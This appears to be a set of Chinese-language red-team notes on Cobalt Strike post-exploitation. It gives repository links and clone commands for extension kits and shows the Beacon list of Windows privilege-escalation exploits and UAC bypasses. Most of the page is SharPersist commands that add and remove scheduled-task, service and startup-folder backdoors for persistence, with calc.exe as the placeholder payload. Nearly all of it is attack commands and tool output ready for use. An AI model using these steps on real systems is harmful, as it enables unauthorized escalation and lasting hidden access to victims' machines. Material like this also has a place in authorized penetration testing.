加载脚本

https://cobalt-strike.github.io/community_kit/  
https://github.com/outflanknl/C2-Tool-Collection
添加机器账户
枚举域信息
AD密码喷射等
https://github.com/k8gege/Ladon
https://github.com/rsmudge/ElevateKit 提权脚本
>git clone https://github.com/rsmudge/ElevateKit.git
>git clone https://github.com/TheKingOfDuck/myScripts.git
Cobalt Strike -> Scripts 选择elevate.cna加载
提权的EXP列表就会增加已经加入的模块
beacon> runasadmin

Beacon Command Elevators
========================

    Exploit                         Description
    -------                         -----------
    ms14-058                        TrackPopupMenu Win32k NULL Pointer Dereference (CVE-2014-4113)
    ms15-051                        Windows ClientCopyImage Win32k Exploit (CVE 2015-1701)
    ms16-016                        mrxdav.sys WebDav Local Privilege Escalation (CVE 2016-0051)
    svc-exe                         Get SYSTEM via an executable run as a service
    uac-schtasks                    Bypass UAC with schtasks.exe (via SilentCleanup)
    uac-token-duplication           Bypass UAC with Token Duplication
权限维持
https://github.com/0xthirteen/MoveKit
https://github.com/fireeye/SharPersist
列出
SharPersist -t schtaskbackdoor -m list
SharPersist -t startupfolder -m list
SharPersist -t schtask -m list
添加后门
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
SharPersist -t schtaskbackdoor -n "Something Cool" -m remove

SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m add
SharPersist -t service -n "Some Service" -m remove

SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly
SharPersist -t schtask -n "Some Task" -m remove